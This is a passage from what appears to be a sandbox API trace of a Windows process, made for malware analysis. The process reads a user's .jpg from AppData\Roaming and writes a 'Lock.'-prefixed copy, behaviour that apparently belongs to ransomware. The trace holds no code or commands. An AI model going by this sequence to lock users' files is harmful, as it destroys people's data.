Flags=0x0, Size=0x10) returned 0x24a9648 [0195.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0195.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0195.277] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0195.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0195.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0195.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0195.277] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0195.277] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.277] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.277] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0195.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0195.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0195.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0195.278] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/AX5eJBJ82y3.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ax5ejbj82y3.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0195.278] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.278] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0195.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0195.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0195.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0195.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0195.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0195.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0195.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0195.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0195.279] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0195.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0195.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0195.279] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0195.279] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0195.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0195.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0195.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0195.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0195.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0195.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0195.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0195.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0195.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0195.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0195.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0195.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0195.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0195.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0195.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24b30f8 [0195.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0195.280] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming")) returned 0x2010 [0195.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0195.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0195.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0195.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24c7a50 [0195.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0195.280] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Lock.AX5eJBJ82y3.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lock.ax5ejbj82y3.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0195.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0195.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0195.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0195.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0195.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0195.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0195.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0195.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0195.298] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0195.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0195.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0195.298] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0195.299] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0195.299] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0195.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0195.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0195.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0195.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0195.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0195.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0195.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0195.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0195.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0195.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0195.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0195.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0195.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0195.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0195.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0195.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0195.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0195.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0195.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0195.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0195.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0195.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0195.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0195.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x36b0020 [0195.304] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0195.304] ReadFile (in: hFile=0x1f8, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0195.315] ReadFile (in: hFile=0x1f8, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x4d34, lpOverlapped=0x0) returned 1 [0195.327] ReadFile (in: hFile=0x1f8, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0195.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0195.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0195.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0195.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14d34) returned 0x24d7a58 [0195.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0195.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0195.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0195.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0195.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0195.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0195.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0195.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0195.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0195.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14d34) returned 0x34b2250 [0195.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0195.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0195.332] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0195.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0195.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0195.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0195.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0195.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14d34) returned 0x24d7a58 [0195.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0195.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0195.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0195.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0195.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0195.334] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0195.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0195.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0195.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0195.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0195.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0195.334] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0195.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0195.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0195.335] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0195.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0195.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0195.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18c8 [0195.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0195.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0195.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0195.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0195.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14d34) returned 0x24d7a58 [0195.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0195.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18f8 [0195.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0195.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0195.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0195.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1788 [0195.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0195.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0195.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0195.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1798 [0195.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0195.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0195.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0195.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1b8 [0195.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0195.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0195.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0195.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0195.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0195.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0195.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0195.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14d34) returned 0x34c6f90 [0195.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0195.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0195.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0195.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0195.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0195.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0195.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0195.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0195.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0195.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0195.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0195.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0195.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0195.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0195.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0195.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0195.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0195.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0195.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0195.339] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0195.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0195.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0195.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0195.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0195.340] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0195.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0195.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0195.340] HeapFree (in: 